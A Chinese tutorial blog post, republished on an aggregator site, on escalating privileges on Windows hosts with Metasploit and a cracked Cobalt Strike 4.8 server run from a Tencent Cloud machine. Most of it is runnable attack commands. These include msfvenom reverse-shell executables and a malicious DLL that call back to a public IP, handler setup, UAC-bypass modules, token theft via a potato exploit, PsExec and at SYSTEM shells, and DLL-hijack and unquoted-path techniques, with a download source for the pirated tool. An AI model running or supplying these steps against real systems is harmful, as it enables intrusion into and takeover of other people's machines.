权限提升WIN篇(腾讯云,CS,MSF)

这篇具有很好参考价值的文章主要介绍了权限提升WIN篇(腾讯云,CS,MSF)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

溢出漏洞

信息收集

操作系统版本 ver,systeminfo
漏洞补丁信息 systeminfo
操作系统位数 systeminfo
杀软防护 tasklist /svc
网络 netstat -ano,ipconfig
当前权限 whoami

权限提升WIN篇(腾讯云,CS,MSF),安全,腾讯云,云原生,网络安全,web安全

筛选EXP

根据前面的信息收集中的系统版本,位数和补丁情况筛选出合适的EXP

提权

根据EXP,可以选择手工操作,基于CS的半自动操作,基于MSF的全自动操作

如果提权中遇到无法执行命令的情况,可以尝试上传cmd.exe来执行

手工

可以根据GitHub上的工具和公开的利用脚本进行渗透

MSF(搭建在云服务器)

在云服务器搭建msf的目的,因为我们进行渗透测试的目标不可能只在靶机,我们需要一个公网IP来完成,此外,云服务器需要开启相应的端口,否则不能收到反弹shell

权限提升WIN篇(腾讯云,CS,MSF),安全,腾讯云,云原生,网络安全,web安全

我的服务器是腾讯云宝塔版本,还要关闭宝塔防火墙或者开启相应端口

权限提升WIN篇(腾讯云,CS,MSF),安全,腾讯云,云原生,网络安全,web安全

在/opt下搭建msf命令

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

使用msf生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=43.139.79.52 lport=7777 -f exe -o test.exe

开启msf监听模块,模块的设置应与生成的木马一致

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 7777

run

通过拿到的shell上传并执行木马

权限提升WIN篇(腾讯云,CS,MSF),安全,腾讯云,云原生,网络安全,web安全

权限提升WIN篇(腾讯云,CS,MSF),安全,腾讯云,云原生,网络安全,web安全 需要说的是,由于没有经过免杀处理,防火墙,杀毒软件等都会导致不能成功获得反弹shell

权限提升WIN篇(腾讯云,CS,MSF),安全,腾讯云,云原生,网络安全,web安全

获得shell后,下一步就是利用msf来进行提权操作

 background  将界面切换到后台,记住session id

use post/multi/recon/local_exploit_suggester  使用msf的提权模块

show options 

set session 2

run

 权限提升WIN篇(腾讯云,CS,MSF),安全,腾讯云,云原生,网络安全,web安全

 选择可用的漏洞模块,直接利用提权

use exploit/windows/local/bypassuac_fodhelper

 show options 

set session 2

run

CS

我的云服务器默认是没有Java环境的,所以还要先搭建Java环境

java环境搭建

yum安装 openjdk11

yum install -y java-11-openjdk

安装位置默认为/usr/lib/jvm/,修改目录名

mv -v java-11-openjdk-11.0.12.0.7-0.el8_4.x86_64 jdk11

修改配置文件

vim /etc/profile


将光标移动到最后,在后面添加

export JAVA_HOME=/usr/lib/jvm/jdk11
export JRE_HOME=${JAVA_HOME}/jre
export CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JRE_HOME/lib
export PATH=$PATH:$JAVA_HOME/bin:$JRE_HOME/bin


立即生效

source /etc/profile


检测是否安装成功

java -version
CS搭建
 

这是我下载CS4.8破解版本的网站

您正搜索 CS - 🔰雨苁ℒ🔰 (ddosi.org)

权限提升WIN篇(腾讯云,CS,MSF),安全,腾讯云,云原生,网络安全,web安全

如图,CS是一个多人协同的渗透工具,分为客户端和服务端,服务端可以有多个,多个攻击者连接在一个服务器上,共享攻击资源和目标信息,且拥有各种强大的功能 

服务端搭建

上传CS到云服务器,这里用使用宝塔面板上传的方式

权限提升WIN篇(腾讯云,CS,MSF),安全,腾讯云,云原生,网络安全,web安全

 cd CobaltStrike4.8_www.ddosi.org/

cd Server/

chmod +x teamserver 

./teamserver 43.139.79.52 yc    ip为云主机IP,yc为连接密码 

权限提升WIN篇(腾讯云,CS,MSF),安全,腾讯云,云原生,网络安全,web安全 如图,CS服务端搭建成功

客户端搭建

权限提升WIN篇(腾讯云,CS,MSF),安全,腾讯云,云原生,网络安全,web安全

运行cobaltstrike-client.cmd,连接远程服务端,搭建成功

权限提升WIN篇(腾讯云,CS,MSF),安全,腾讯云,云原生,网络安全,web安全

权限提升WIN篇(腾讯云,CS,MSF),安全,腾讯云,云原生,网络安全,web安全

at提权(win2003)

win2003中可以采用计划任务的方式进行提权,以普通用户的权限开启一个计划任务,system执行这个计划任务,就获取了system的权限

at 17:00 /interactive cmd

PsExec提权(win08,12,16)

PsExec.exe -accepteula -s -i -d cmd

权限提升WIN篇(腾讯云,CS,MSF),安全,腾讯云,云原生,网络安全,web安全 ,

 MSF进程迁移注入(Win08,12,16)

通过msf拿到权限后,可以尝试migrate进程迁移,将进程迁移到拥有高权限的用户,实现提权的目的,这种方式利用系统的特性,不用上传文件,不会被杀毒软件等察觉

ps 查看进程

migrate PID 迁移到目标进程

令牌窃取 

令牌就是系统的临时密钥,相当于账户名和密码,原来决定是否允许这次请求和判断是属于哪一个用户的,他允许你不提供密码或其他凭证的前提下访问网络和系统资源

getuid    查看当前用户

use incognito   使用令牌窃取模块

list_tokens -u   列出可用的令牌

impersonate_token 目标令牌   窃取目标令牌

whoami  查看当前用户

低权限用户可以借助烂土豆配合令牌窃取实现提权

 execute -cH -f ./potato.exe

use incognito 

list_tokens -u 

impersonate_token

这里实际是利用烂2土豆这个溢出漏洞 ,使我们可以利用低权限来进行令牌窃取

msf直接提权 

msf是一款强大的渗透测试工具,可以使用getsystem直接提权

getsystem

 Bypass UAC

UAC即用户账户控制,为了上传的exe和bat程序等可绕过此安全机制,所以需要学习

UAC可以直接搜索msconfig>选择系统设置> 工具>更改UAC设置

权限提升WIN篇(腾讯云,CS,MSF),安全,腾讯云,云原生,网络安全,web安全

 默认是这个选项,当我们打开一个程序的时候,就会有弹窗提示程序尝试更改计算机

权限提升WIN篇(腾讯云,CS,MSF),安全,腾讯云,云原生,网络安全,web安全

MSF的bypassUAC模块(win10以后不适用)

use exploit/windows/local/bypassuac

MSF的ask模块(需要目标点击)

use exploit/windows/local/ask

MSF绕过win10模块

use exploit/windows/local/bypassuac_sluihijack  

UACMe 

UACMe是GitHub绕过UAC的项目 

hfiref0x/UACME: Defeating Windows User Account Control (github.com)

DLL劫持提权

Windows程序启动需要dll,如果dll不存在,Windows就会按照既定路线寻找,可以在他寻找的位置放恶意dll来提权

1、应用程序加载的目录
2、C:Windows/System32
3、C:Windows/System
4、Windows
5、当前工作目录Current Working Directory,CWD
6、在PATH环境变量的目录(先系统后用户)

可以借助火绒剑来分析进程,并使用其他程序验证是否可以dll劫持

权限提升WIN篇(腾讯云,CS,MSF),安全,腾讯云,云原生,网络安全,web安全

假如上面的文件可以被dll劫持,就可以把原来的dll文件删掉,使用msf生成一个和他名字相同的dll后门

 msfvenom -p windows/meterpreter/reverse_tcp lhost=43.139.79.52 lport=7777 -f dll -o VCRUNTIME140.dll

 不带引号服务路径提权

在Windows系统中,带不带引号是很重要的,如下面这个程序

C:\Program Files\Dolby.exe

“C:\Program Files\Dolby”

如果不带引号,Files\Dolby被当成一个参数,我们前面说了程序文件寻找路径,那么只要我们在程序真正要寻找路径前放上我们的恶意程序,攻击目的就达成了

C:\Program.exe

当执行 C:\Program Files\Dolby.exe的时候,实际执行的其实是C:\Program.exe

检测工具:https://github.com/PowerShellMafia/PowerSploit
https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk

攻击流程:检测路径>制作文件并上传>更改路径指向>等待目标路径调用文章来源地址https://www.toymoban.com/news/detail-732345.html

到了这里,关于权限提升WIN篇(腾讯云,CS,MSF)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【网络安全】-基本工具msf

    msf (metasploit framework)是一个 开源的渗透测试框架 ,用于开发、测试和执行各种网络安全攻击。metasploit framework提供了大量的 渗透测试工具 、 漏洞利用模块 和 负载模块 ,可以用于发现系统中的漏洞、测试系统的安全性,并进行攻击和漏洞利用。它支持多种操作系统,包括

    2024年01月24日
    浏览(39)
  • 第124天:内网安全-代理技术&Socks协议&路由不出网&后渗透通讯&CS-MSF上线

    个人理解 1、相当于本来流程是:解决网络通信问题 — 拿到权限 — 进行后门控制,但这里小迪只讲了如何解决网络通信问题和如何进行后门控制,拿到权限属于横向移动的内容后面才讲。 2、在本次实验环境中,Win 7主机有外网出口而其余主机没有,所以我们将Win 7当作跳板

    2024年02月13日
    浏览(40)
  • 网络安全kali web安全 Kali之msf简单的漏洞利用

    靶机的IP地址为:192.168.173.136 利用nmap工具扫描其开放端口、系统等 整理一下目标系统的相关信息 系统版本:Windows server 2003 开放的端口及服务: 从扫描出的端口发现,目标主机开启了135端口,服务为msrpc(远程过程调用服务),即Windows的RPC服务。 ​针对这个服务,我们就可

    2024年02月09日
    浏览(41)
  • 【内网安全】搭建网络拓扑,CS内网横向移动实验

    实验拓扑结构如下: **攻击者win10地址:**192.168.8.3 dmz win7地址: 10.9.75.49 172.16.1.1 **DC server2008地址:**172.16.1.254 CS服务器 kali: 10.9.75.171 1、搭建CS服务器,CS客户端连接 攻击者充当CS客户端连接 开启监听 生成木马 攻击者win10 攻击者访问dmz的Web服务器,上传一句话木马,蚁剑连

    2024年02月03日
    浏览(46)
  • 【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限

    文章内容复现于小迪安全相关课程 用户帐户控制 ( User Account Control ,简写作UAC)是 微软 公司在其 Windows Vista 及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对 应用程序 使用 硬盘驱动器 和 系统文件 授权,以达到帮助阻止 恶意程序 (有时也称为“ 恶意

    2024年02月05日
    浏览(38)
  • 122、内网安全——域信息收集&应用网络凭据&CS插件&Adfind&BloodHound

    假设有1000台计算机,运维人员需要为每一台计算机进行软件的安装、环境部署,实际上运维人员不可能亲自对每一台计算机进行软件的安装和环境部署。实际,将所有1000台计算机放入一个域中,域内有一个域控,域控负责下发任务,统一管理。也就是说在域控上下发软件安

    2024年04月14日
    浏览(52)
  • 区块链技术,如何提升网络安全?

    眼下,区块链已经成为科技界的热门技术,甚至被称为颠覆性技术。那么,在网络安全领域,区块链能否发挥作用呢?答案是肯定的。 ——编者 当著名咨询公司Gartner在预测2018年对大部分企业公司影响显著的十大战略技术时,区块链技术位列其中。而最近普华永道国际会计事

    2024年02月05日
    浏览(56)
  • 新鲜出炉!由腾讯安全深度参编的“首份网络安全态势感知国家标准”发布

    近日, 公安部第三研究所牵头、腾讯安全深度参编的信息安全国家标准《信息安全技术-网络安全态势感知通用技术要求》 ,由国家标准化管理委员会正式发布,将于2023年10月1日起实施。 作为国内首份网络安全态势感知的国家标准 ,它规范了网络安全态势感知体系的 数据汇

    2024年02月06日
    浏览(47)
  • 网络安全学习-NTFS安全权限、文件共享

    NTFS安全权限 权限概述 设置NTFS权限,实现不同用户访问不同对象(文件、文件夹)的权限 分配正确访问权限后,用户才能访问资源 设置权限防止资源被篡改、删除 文件系统概述 文件系统就是这个分区的存储格式,不建立文件系统就无法存储任何文件 格式化就是重建文件系

    2024年01月20日
    浏览(42)
  • 提升网络安全重要要素IP地址

    在数字化时代,网络安全已经成为人们关注的焦点。本文将深入探讨网络安全与IP地址之间的紧密联系,以及IP地址在构建数字世界的前沿堡垒中的关键作用。 网络安全是当今数字社会中不可忽视的挑战之一。而IP地址,作为互联网通信的基础协议,既是数字化时代的桥梁,也

    2024年02月03日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包